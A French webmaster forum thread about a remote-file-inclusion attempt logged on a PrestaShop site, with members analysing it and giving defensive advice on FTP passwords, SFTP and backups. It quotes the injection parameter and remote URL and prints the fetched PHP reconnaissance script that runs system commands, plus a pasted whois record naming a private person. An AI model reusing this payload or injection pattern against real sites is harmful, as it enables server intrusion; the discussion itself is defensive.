Piratage : Injection de code !

[Maxime.]

Salut,

J'ai installer crawltrack sur mon site, et j'ai eu une suprise tout a l'heure : injection de code.

Mais cette fois ci celle-ci n'a pas donner d'erreur 404, j'ai comme info :

Vous pouvez être exposé si vous utilisez un de ces scripts: 
PHPCentral Poll

Paramètres utilisés pour les tentatives d'injection de code: 
_SERVER[DOCUMENT_ROOT]=

Fichier/script que le hacker a tenté d'injecter: 
http://cdshop.net.ru////cron/hjr.txt???

J'avoue que je suis un peu perdu la, je sais pas trop quoi faire avec ca. A t-il reelement injecter qq chose ?

Du coup j'ai activer le blocage des ces attaques sur crawltrack mais je ne sais pas si cela peut nuir au fonctionnement du site.

Si qq a une idée...

De plus j'ai une adresse bizare qui est venu me visiter 10 fois :

http://10.50.1.57:15871/cgi-bin/blockOptions.cgi?ws-session=1228100943

le ws_session changeait a chaque fois.

Bref on se sent pas tranquil ^^

[sofred]

Hello, tu es hébergé oú ?

[sofred]

Excuse, j'avais pas vu la signature OVH 90 Plan

[sofred]

quand tu tapes la première adresse tu trouves ce code :
<?
echo "hajar

";
$hjr = @php_uname();
$hjr2 = system(uptime);
$hjr3 = system(id);
$hjr4 = @getcwd();
$hjr5 = getenv("SERVER_SOFTWARE");
$hjr6 = phpversion();
$hjr7 = $_SERVER['SERVER_NAME'];
$hjr8 = gethostbyname($SERVER_ADDR);
$hjr9 = get_current_user();
$os = @PHP_OS;
echo "os: $os

";
echo "uname -a: $hjr

";
echo "uptime: $hjr2

";
echo "id: $hjr3

";
echo "pwd: $hjr4

";
echo "user: $hjr9

";
echo "phpv: $hjr6

";
echo "SoftWare: $hjr5

";
echo "ServerName: $hjr7

";
echo "ServerAddr: $hjr8

";
echo "SIKAT TECHNOLOGY BEKASI JOMBANG

";
exit;
?>

je continue mes recherches....

[sofred]

un petit whois sur http://cdshop.net.ru et voici le propriétaire du site :
domain: CD-SHOP.NET.RU
type: CORPORATE
admin-o: ROOTHOST-RIPN
nserver: ns2h2.3to.org.
nserver: ns1h2.3to.org.
created: 2004.09.07
state: Delegated
changed: 2008.09.07
mnt-by: ROOTHOST-MNT-RIPN
source: RIPN

person: SERHIY V LOMACHYNSKYY
nic-hdl: ROOTHOST-RIPN
address: Serhiy Lomachynskyy
address: Wilhelmstr 88
address: 38100 Braunschweig
address: Germany
phone: +49 179 7458539
fax-no: +49 179 7458539
e-mail: [email protected]
changed: 2008.04.23
mnt-by: ROOTHOST-MNT-RIPN
source: RIPN

Je continue...

[Maxime.]

Merci ^^

Ca me parle pas des masses par contre

Il faudrai que le bloque l'acces du site par l'adresse donc ?

[SmartiesKiller]

hello j'voudrais bien l'installer aussi le crawltrack mais je ne sais pas ou il faut coller le code generé ??

merci d'avance.

[Maxime.]

je l'ai mis dans config.inc.php , premeire ligne

[sofred]

en fait je tente de comprendre en temps réel cette agression... un script malveillant a tenté d'ètre injecté. A première vue celui-ci tente de récupérer des informations sur ton serveur, ton hebergeur, et tes login ftp.
conseil nmr 1 : change de suite tes login ftp
tu utilises quel logiciel ftp ?

[Maxime.]

Fillezilla...

J'ai changer direct mon mot de passe quand j'ai vu ca

[sofred]

Fillezilla a des failles et certains arrive a recupérer les infos ftp via ce logiciel. Je sais il est gratuit mais il faut opter pour un autre... Sur le forum le pb a été traité...
Sur un 90 Plan tu as un firewall ?

[sofred]

sur le forum :
http://www.prestashop.com/forums/viewthread/23399/installation_configuration_et_mise_a_jour/site_hacke

[Maxime.]

Je ne sais pas pour le firewall...

Je vais changer de soft donc ^^ on sais jamais

[sofred]

Soumet ton pb également à OVH... A mon avis c'etait une belle tentative de piratage mais pas pro... Tant mieux !

[Maxime.]

Ouaip, je ne pense pas qu'il y est eu des sequelles... je croise les doigts en tout cas.

Relou quand même ces attaques, on est pas tranquil !

Merci pour ton coup de main.

[Alekhine]

Hello,

Y-a moyen d'installer crawltrack et de protéger plusieurs sites/DB ?
ou il faut l'installer sur chaque site :s ?
(sur le même hébergement j'ai 10 DB et d'autres répertoires de sites/forums...)

[Maxime.]

Tu peux utilisé un crawltrack pour plusieur site

[sofred]

De rien Ma2x, mais il faut rester prudent. Ça n'arrive pas qu'aux autres ! Malheureusement c'est courant... Prestashop réagit bien et n'a apparement pas de failles. Je remarque cependant que beaucoup de tentative se font chez OVH donc toujours les mêmes conseils :
sauvegardes régulières, changement fréquent des ftp, ... Et surtout en fonction de ton CA, des hébergements qui tiennent la route !
Bonne continuation

[Alekhine]

Tu peux utilisé un crawltrack pour plusieur site

Oui j'ai vu, mais il ne scan le flux que d'une DB ...
si j'en ai 10 différentes je fais comment ?

[SmartiesKiller]

moi installer sur index.php et ca passe nickel,j'ai installer pour mes 4 site heberger sur phpnux et pour le moment ca roule pas de probleme d'injection pour moi.

MErci encore de nous l'avoir fait decouvir

[Marie]

Fillezilla a des failles et certains arrive a recupérer les infos ftp via ce logiciel. Je sais il est gratuit mais il faut opter pour un autre... Sur le forum le pb a été traité...
Sur un 90 Plan tu as un firewall ?

Pour info, FileZilla gère le SFTP => Dans le "Gestionnaire de Sites", créer un accès sur un serveur "SFTP en utilisant un SSH2".

J'ai choisi cette option récemment, trop de hack dans l'air en ce moment.

Bon faut dire que la revue "Capital" du mois de juillet ne nous arrange pas (voir la PJ), ils font leur une avec un joli chapeau "Pirater un site web, trop facile !" => bah c'est clair que ça va donner des idées... Sont pas malins parfois ces journalistes

Marie

[Alekhine]

Pour info, FileZilla gère le SFTP => Dans le "Gestionnaire de Sites", créer un accès sur un serveur "SFTP en utilisant un SSH2".

J'ai choisi cette option récemment, trop de hack dans l'air en ce moment.

Hello,

Oui ça ne peut pas faire de mal, mais depuis 2 ans il y a un type de hack avec une préparation particulière:
1) installation d'un virus sur le pc (local, le votre quoi...)
2) Décodage des mots de passe de la base de Filezila (mais aussi FlashFXP, etc..).
3) désactivation de la plupart des antivirus (impossible de le réinstaller sans killer le Rootkit !) et envoi des mots de passe sur le pc du hacker pour compléter sa base de données.
4) Des robots se servent dans la base pour installer des script sur votre ftp (pour spammer sous votre identité), ou bousillage en règle du site par injection de code dans les index.php

Le SFTP ne changera rien à ça puisqu'il a vos pass :/

Solution : ne pas enregistrer de pass, ni dans l'explorer, ni dans le client FTP. (c'est bien chiant je sais, mais chez moi c'est comme ça depuis que je me suis fait eu )

Pour les passes faites des phrases, on les mémorise bien, et on peu noter dans un callepin des indications qui nous permette facilement de se remémorer le pass réel...

[sofred]

Dur dur la vie du webmaster et notamment dans le e-commerce. On se retrouve en fait comme des commerçants qui se font bousiller leur vitrine ou cambrioler la marchandise... Aujourd'hui il n'y a plus réellement de solution miracle tellement cette piraterie s'adapte et devient de plus en plus facilement virulente.
Ma première option a été de bosser sur Mac pour la production et je me sers du PC uniquement pour voir les compatibilités de navigateurs. Déja on élimine pas mal de soucis mais ne jamais se croire à l'abri. Ensuite dans les forums je suis discret sur l'url de mon shop : on ne sait jamais, une mauvaise remarque, des jaloux, ... Parano ? Aujourd'hui notre seul chance avec les "cons" (excusez du language), c'est qu'ils ne volent pas sinon il ne ferait plus jour. Moi aujourd'hui j'appelle cela de la prudence. Trop de travail et d'enjeu financier pour prendre le moindre risque.
Au final plus rien ou le minimum sur le disque dur interne de la machine de prod. Tout est sur un externe protégé par firewall et anti virus (même sur mac). Reboutage des machines tous les 10 jours... Et comme Alekhine jamais de pass dans les logiciels FTP. C'est du boulot je sais. C'est chiant, c'est sûr... Faut souffrir pour réussir. J'ai mis 10 ans de e-commerce pour appliquer cela et croyez-moi des galères j'en ai eu avec ces '("§é de hackers.
Il ne faut pas les ignorer et rester en veille technologique sur leurs méthodes (sans pur autant devenir comme eux). Car au final devenir hackers c'est pas difficile et il ferait mieux de prévenir de la vulnérabilité de ton système que venir pêter ton travail. Mais là c'est un autre débat....
Courage à tous !!!

[junnecito]

Bjr et merci; moi j'ete 2 fois pirate et je suis.... ral le bol pour ne pas dir outre chose..... ou dois je introuire le crawltrack???? merci de vos reponses, j'ai 3 boutique dans 1and1. es et 2 avec 1and1.com.
Merci d'avance.

[Maxime.]

Dur dur la vie du webmaster et notamment dans le e-commerce. On se retrouve en fait comme des commerçants qui se font bousiller leur vitrine ou cambrioler la marchandise... Aujourd'hui il n'y a plus réellement de solution miracle tellement cette piraterie s'adapte et devient de plus en plus facilement virulente.
Ma première option a été de bosser sur Mac pour la production et je me sers du PC uniquement pour voir les compatibilités de navigateurs. Déja on élimine pas mal de soucis mais ne jamais se croire à l'abri. Ensuite dans les forums je suis discret sur l'url de mon shop : on ne sait jamais, une mauvaise remarque, des jaloux, ... Parano ? Aujourd'hui notre seul chance avec les "cons" (excusez du language), c'est qu'ils ne volent pas sinon il ne ferait plus jour. Moi aujourd'hui j'appelle cela de la prudence. Trop de travail et d'enjeu financier pour prendre le moindre risque.
Au final plus rien ou le minimum sur le disque dur interne de la machine de prod. Tout est sur un externe protégé par firewall et anti virus (même sur mac). Reboutage des machines tous les 10 jours... Et comme Alekhine jamais de pass dans les logiciels FTP. C'est du boulot je sais. C'est chiant, c'est sûr... Faut souffrir pour réussir. J'ai mis 10 ans de e-commerce pour appliquer cela et croyez-moi des galères j'en ai eu avec ces '("§é de hackers.
Il ne faut pas les ignorer et rester en veille technologique sur leurs méthodes (sans pur autant devenir comme eux). Car au final devenir hackers c'est pas difficile et il ferait mieux de prévenir de la vulnérabilité de ton système que venir pêter ton travail. Mais là c'est un autre débat....
Courage à tous !!!

Assez d'accord avec cela, meme si sur pc, je pense que le meilleur antivirus reste l'utilisateurs, si on fait un peu attention, genéralement on a pas de problème, mais on est jamais à l'abris c'est clair.

Par contre pour les mot de passe FTP, j'etais plutot confiant mais apres ça, je les ai enlever direct.

En tout cas je ne pensais pas qu'il fallais etre aussi vigilant par rapport a ça. Je me dit aussi que si crawltrack n'etait pas installer, j'aurais même pas ete averti de cette attaque.Enfin bref, deja qu'on stress pour gerer la pub/ les clients/ les ventes ect... maintenant il faut rajouter l'element piratage!

Mais les gros site comme cdiscount / fnac / alapage / les gros portail ect... ils doivent subir des attaques tous les jours non ?

[sofred]

Plus que crawltrack il faut vérifier les logs et scruter le trafic... Je pense qu'un bon hacker saura éviter crawltrack.
Vérifiez quand même que crawltrack ne consomme pas trop de bande passante ni trop de ressources serveurs.... Gare aux mauvaises surprises (factures surgonflées, hébergeur qui oblige de changer d'offre, etc)
Concernant les gros portails de vente, ils ont la team qui va bien et surtout un hébergement ultra sécurisé avec des back up (sauvegardes) hors normes... Quand ton business commence à bien démarrer il faut opter pour un dédié et dégager assez vite du mutualisé. Ou peut être mieux, se rapprocher de prestashop et examiner leur offre... Je pense qu'ils ont anticipé pas mal de pbs...

[Alekhine]

Il ne faut pas trop s'alarmer non plus. Les attaques directes d'une personne contre une autre restent rares.

Le vrai problème c'est que les spammer chercher des pigeons pour envoyer des mails en masse, c'est donc des robots qui travaillent en puisant les login/pass dans la base de données des "hacker", c'est pas vraiment piour "casser" le site, au contraire, ils veulent justement être très discret pour réussir à spammer le plus longtemps possible avant que vous découvriez le truc (quoi que de nos jour ça va vite parce que l'hébergeur a des alertes si vous envoyez 5000 mails en 24h :-O )

Bref faut pas devenir parano en pensant qu'un gugus veut casser votre boutique...
De toute façon si le cas se présente un jour il y arrivera.

[sofred]

Le but n'est évidemment pas d'être parano mais d'être vigilant. Pour 50 € tu te commandes un hacker pour bousiller le site de ton concurrent. Aujourd'hui c'est facile comme un contrôle fiscal : tu dénonces et tu te fais défoncer...
Faut pas non plus confondre spammers et hacker... Un hacker ne cherches pas à récupérer des emails en masses. En revanche, les spammers se sont les grosses boîtes marketing qui sont équipés via des sociétés écrans pour crawler les sites et faire de la recup' d'email... Le hacker lui fait son scoring de sites hackés donc plus ils cassent du site, plus ils sont crédibles.
J'ai connu ça avec oscommerce et ils jouaient au bowling avec nos sites... Crois moi j'ai vraiment de l'expérience avec ces nazes et aujourd'hui je connais beaucoup de leurs combines. J'ai testé prestashop à pas mal d'épreuves et ça résiste bien.
Pour info : il est facile aujourd'hui d'envoyer 5000 mails par jour sans avoir de soucis mais serveur dédié obligé !

[Alekhine]

Le but n'est évidemment pas d'être parano mais d'être vigilant. Pour 50 € tu te commandes un hacker pour bousiller le site de ton concurrent. Aujourd'hui c'est facile comme un contrôle fiscal : tu dénonces et tu te fais défoncer...

lol, oui mais c'est très dangeureux le coup du contrôle fiscal... , les gens ont des relations, et/ou les femmes de ménages du CGI pourraient ne pas cracher sur un billet rouge.
D'ailleurs, plus le "dénoncé" aura du poids (en CA) et plus vite il connaîtra le nom de la balance.
Quand à l'autre (petit CA), quand le contrôleur montera dans ça bagnole pour aller à sa rencontre il aura déjà claquer plus de tune qu'il n'en récupèrera

[sofred]

C'était une métaphore... Je voulais surtout dire qu'un site hacké n'est pas forcément dû au hazard et qu'il n'est pas rare qu'il provienne d'une attaque directe d'une personne ou d'une société... Comme un contrôle fiscal... Mais c'est pas le sujet. un site lorsqu'il dérange, d'autres s'en arrange :
Demain lorsque tu feras le CA du nmr 1 du marché de la bougie, on en reparlera... Ceci dit c'est tout le mal que je te souhaite le hacking fait partie de la notoriété ;D

[Alekhine]

mdr, N°1 de la bougie
Alors je réfléchie 2 minutes, Partylite ne fait que 12 millions de dollars par an, je devrais pouvoir le griller vers 2060 ou 2070, d'ici là la sarkoretraire sera à 120 ans, donc c'est jouable :-D

[sofred]

Je voulais simplement filer un petit coup de main à Ma2x parce que j'ai un peu d'expérience dans le domaine. Je pense qu'il a compris, m'a remercié et c'est bien comme ça. Maintenant je viens pas dans le forum pour récupérer un statut ou faire un score de messages. J'essaye d'être utile et je l'ai été...
Maintenant là on s'écarte grave du sujet et ce genre de remarques ne serviront à personnes sauf à te faire marrer. Evitons de polluer ce forum qui est super utile. Le hacking n'est pas à prendre à la légère et d'accord qu'il ne faut pas être parano... Mais prudent !
Dernière info sur crawltrack. En parcourant sur le web j'ai remarqué que le script consomme en ressources et certains hébergeurs peuvent le bloquer...
Voilà j'ai fini
Je sors

[Alekhine]

Oui on a tous compris que tu avais aidé, personne n'a dit le contraire (?)

Parfois certains post comportent un peu d'humour, ça ne fait pas de mal, on est pas à l'usine...

Je ne fais pas non plus un score de message, j'ai une boutique qui tourne bien techniquement, mais je viens ici aider tant que je le peux avec mes maigres compétences, je crois avoir posé 6 questions en tout, le reste du compteur c'est de l'aide faite avec plaisir

[Damien Metzger]

Sofred, je t'invite a essayer de casser-hacher-hacker-cracker du PrestaShop 1.2 dans tous les sens.
On est prudent, mais je n'ai pas l'esprit aussi tordu que certains hackers.

Et si tu y arrives, tu peux nous communiquer le résultat directement sans passer par le forum :]

[Maxime.]

bon je vais passer en 1.2 du coup ^^

[sofred]

Bonjour Damien,
C'est en cours actuellement... J'essaye de le démonter dans tous les sens ( c vrai qu'avec un code source c'est plus facile ) et tout résiste pour le moment. J'en suis qu'au début et je te tiendrais au courant par la suite en MP si je trouve des failles.